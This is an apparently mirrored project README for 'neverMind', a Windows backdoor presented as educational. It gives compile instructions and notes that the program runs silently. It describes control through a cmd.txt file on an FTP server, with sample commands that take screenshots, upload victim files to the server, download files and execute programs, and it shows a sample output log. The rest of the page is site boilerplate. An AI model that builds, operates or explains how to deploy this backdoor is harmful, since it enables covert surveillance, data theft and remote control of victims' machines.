Code Monkey home page Code Monkey logo

nevermind's Introduction

neverMind

educational purposes only!

read more on my blog!

compile (on windows)

  1. open developer command prompt in visual studio (this uses the MSVC compiler)

  2. navigate to directory where main.cpp is stored

  3. compile using cl

cl /EHsc main.cpp

once you have the executable, click it and the backdoor runs silently in the background.

overview (quick)

the program is controlled remotely via commands stored in a file on an FTP server.

  1. FTP server setup: the program requires an FTP server to be set up with a specific directory structure. the server must have a directory with the same name as the windows username of the target system. inside this directory, there should be a file named cmd.txt that contains the commands to be executed.

  2. command file: the cmd.txt file contains the commands that the program executes. each line in the file represents a separate command. the program supports several commands: print, screen, upload, download, exec.

  • example of cmd.txt:
print hello, world!
screen 1
upload C:\\Users\\bilal\\Desktop\\file.txt file.txt
download file2.txt
exec notepad.exe

the program is instructed to:

  • print the message "hello, world!"

  • take 1 (one) screenshot

  • upload the file C:\\Users\\bilal\\Desktop\\file.txt to the FTP server with the name file.txt

  • download the file file2.txt from the FTP server

  • execute the command notepad.exe which opens the notepad app

  1. output upload: after executing the commands, the program uploads an output.txt to the FTP server. this file contains the output of the executed commands and any error messages.
  • example of output.txt:
[PRINT][>] hello, world! [<]
[SCREEN][++] screenshot saved >> C:\\Users\\bilal\\AppData\\Local\\SystemConnect\\data\\screenshot1.bmp [++]
[UPLOAD][++] file C:\\Users\\bilal\\Desktop\\file.txt upload as file.txt successful [++]
[DOWNLOAD][++] file file2.txt download successful [++]

nevermind's People

Contributors

bilals12 avatar

Stargazers

 avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.